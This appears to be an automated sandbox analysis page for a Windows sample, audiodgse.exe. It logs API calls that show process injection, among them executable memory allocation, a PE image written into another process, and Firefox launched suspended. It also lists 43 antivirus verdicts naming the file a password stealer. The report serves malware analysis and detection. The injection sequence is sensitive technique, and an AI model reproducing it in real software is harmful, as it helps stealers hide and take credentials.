NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2592 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000268	1	0
WriteProcessMemory Oct. 26, 2023, 5:10 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELvzìWà¾ðÐ@Ð@.text¼¾ ` base_address: 0x00400000 process_identifier: 2592 process_handle: 0x00000268	1	1
WriteProcessMemory Oct. 26, 2023, 5:10 p.m.	buffer: base_address: 0x00401000 process_identifier: 2592 process_handle: 0x00000268	1	1
WriteProcessMemory Oct. 26, 2023, 5:10 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2592 process_handle: 0x00000268	1	1
NtSetContextThread Oct. 26, 2023, 5:10 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199664 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000026c process_identifier: 2592	1	0
NtResumeThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x0000026c suspend_count: 1 process_identifier: 2592	1	0
NtResumeThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x0000019c suspend_count: 1 process_identifier: 2692	1	0
CreateProcessInternalW Oct. 26, 2023, 5:10 p.m.	thread_identifier: 2908 thread_handle: 0x00000350 process_identifier: 2904 current_directory: filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: filepath_r: C:\Program Files\Mozilla Firefox\Firefox.exe stack_pivoted: 0 creation_flags: 12 (CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000318	1	1

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Lionic	Trojan.Win32.Agensla.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.70024774
Skyhigh	BehavesLike.Win32.Generic.jc
McAfee	GenericRXWL-AW!699B84A4A3C7
Cylance	unsafe
Sangfor	Infostealer.Msil.Kryptik.V63d
BitDefender	Trojan.GenericKD.70024774
CrowdStrike	win/malicious_confidence_90% (W)
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	Scr.Malcode!gdn34
ESET-NOD32	a variant of MSIL/GenKryptik.GPLI
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-PSW.MSIL.Agensla.gen
Alibaba	TrojanPSW:MSIL/Agensla.974c0718
NANO-Antivirus	Trojan.Win32.Agensla.kcquqk
Rising	Stealer.Agensla!8.13266 (CLOUD)
Sophos	Troj/Krypt-ABH
F-Secure	Trojan.TR/Kryptik.dnwxq
DrWeb	Trojan.PackedNET.2470
FireEye	Trojan.GenericKD.70024774
Emsisoft	Trojan.GenericKD.70024774 (B)
Ikarus	Win32.Outbreak
GData	Trojan.GenericKD.70024774
Google	Detected
Avira	TR/Kryptik.dnwxq
MAX	malware (ai score=83)
Antiy-AVL	Trojan[PSW]/MSIL.Agensla
Gridinsoft	Trojan.Win32.Packed.sa
Arcabit	Trojan.Generic.D42C7E46
ZoneAlarm	HEUR:Trojan-PSW.MSIL.Agensla.gen
Microsoft	Trojan:MSIL/FormBook.AFB!MTB
Varist	W32/MSIL_Agent.GSY.gen!Eldorado
AhnLab-V3	Trojan/Win.PowerShell.C5529925
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.MalPack
Panda	Trj/Chgt.AD
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenKryptik.GOZC!tr
AVG	Win32:PWSX-gen [Trj]
Avast	Win32:PWSX-gen [Trj]

audiodgse.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All